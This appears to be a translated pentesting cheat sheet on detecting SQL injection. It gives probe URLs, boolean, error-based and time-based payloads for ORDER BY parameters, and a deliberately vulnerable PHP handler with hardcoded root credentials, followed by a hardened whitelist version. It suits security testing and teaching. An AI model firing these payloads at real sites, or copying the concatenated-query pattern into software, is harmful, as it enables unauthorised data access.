Summary of SQL injection detection methods (continuously updated)


http://e.com/1.php?id=1
http://e.com/1.php?id=1-- sd
 
http://e.com/1.php?id=aaa
http://e.com/1.php?id=aaa'-- sd
 
http://e.com/1.php?id=aaa
http://e.com/1.php?id=aaa' '
http://e.com/1.php?id=aaa'||'
http://e.com/1.php?id=aaa'%2b'
 
id=1 and 1=if(1=2,1,(select 1 union select 2)) 
id=1 and 1=if(1=1,1,(select 1 union select 2))
 
id=1 order by 1      normal
id=1 order by 1,     error
id=1 order by 1, 1   normal

When the request has Content-Type: application/json:
you can try \u0027 in place of the single quote.

orderby injection:

<?php
// Deliberately vulnerable demo: both POST parameters are concatenated straight into the ORDER BY clause.
$con = mysql_connect("localhost","root","123456") or die();
mysql_select_db("burp");
$orderby = $_POST['orderby'];
$order = $_POST['order'];
$sql = "select * from `sql` order by ".$orderby." ".$order;
echo $sql;   // echoing the query makes the injection point visible to the tester
$res = mysql_query($sql);
echo "<br><br>";
echo "<b>";
while($rows = @mysql_fetch_array($res,MYSQL_ASSOC)){
    echo $rows['new'];
}
echo "</b>";
?>

 

In the code above, both $orderby and $order are injectable.

When I run into order / orderby parameters, I usually test them like this:

orderby=id,&order=asc

orderby=id,1&order=asc

So the injection can be done like this:

,if(1=1,1,(select 1 union select 2))

,if(1=2,1,(select 1 union select 2))

Then it can be handed to sqlmap and run happily.

The order parameter works the same way as above.
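For contrast, here is a hardened version of the handler above (an added example, not code from the original post). It assumes the same `burp` database and `sql` table with columns `id` and `new`, and uses mysqli; because ORDER BY identifiers and direction keywords cannot be bound as prepared-statement parameters, the only safe approach is a whitelist, so every probe shown above (`id,`, `id,1`, `rlike if(...)`, `sleep(1)`) is rejected before it reaches the SQL string.

```php
<?php
// Hardened order-by handler (added example). Assumed schema: table `sql` with columns `id` and `new`.
// Whitelists map the user-supplied value to a fixed, back-quoted identifier or a fixed keyword.
$allowedColumns = ['id' => '`id`', 'new' => '`new`'];
$allowedOrder   = ['asc' => 'ASC', 'desc' => 'DESC'];

$orderbyParam = $_POST['orderby'] ?? 'id';
$orderParam   = strtolower($_POST['order'] ?? 'asc');

// Exact-match lookup: "id," or "id,1" or "rlike if(1=1,1,char(40))" are not keys, so they are refused.
if (!isset($allowedColumns[$orderbyParam]) || !isset($allowedOrder[$orderParam])) {
    http_response_code(400);
    exit('invalid sort parameter');
}

// Only whitelist values ever get concatenated; user input never touches the query text.
$sql = 'SELECT `new` FROM `sql` ORDER BY '
     . $allowedColumns[$orderbyParam] . ' ' . $allowedOrder[$orderParam];

$mysqli = new mysqli('localhost', 'root', '123456', 'burp');
if ($mysqli->connect_error) {
    http_response_code(500);
    exit('database error');   // do not echo the query or the error text to the client
}

$res = $mysqli->query($sql);
echo '<b>';
while ($row = $res->fetch_assoc()) {
    // Output-encode so column contents cannot inject HTML either.
    echo htmlspecialchars($row['new'], ENT_QUOTES, 'UTF-8'), '<br>';
}
echo '</b>';
```

Note that the original also echoed the built query back to the client; the hardened version never does, so a tester gets no error or query reflection to work from.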

Now for another injection method:

First, two statements for comparison:

mysql> select user from mysql.user where user='admin' order by user rlike char(40);
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> select user from mysql.user where user='admin' order by user rlike 1;
+-------+
| user  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

So statements like these can be constructed:

orderby=id&order=rlike if(1=1,1,char(40))

orderby=id&order=rlike if(1=21,1,char(40))

or: rlike (case when 1=1 then 1 else (select 1 union select 2)end)

Data can then be extracted with:

rlike (case when 1=1 sqlinject then 1 else (select 1 union select 2)end)

Finally, sleep can also be used to detect the injection:

orderby=sleep(1)&order=asc

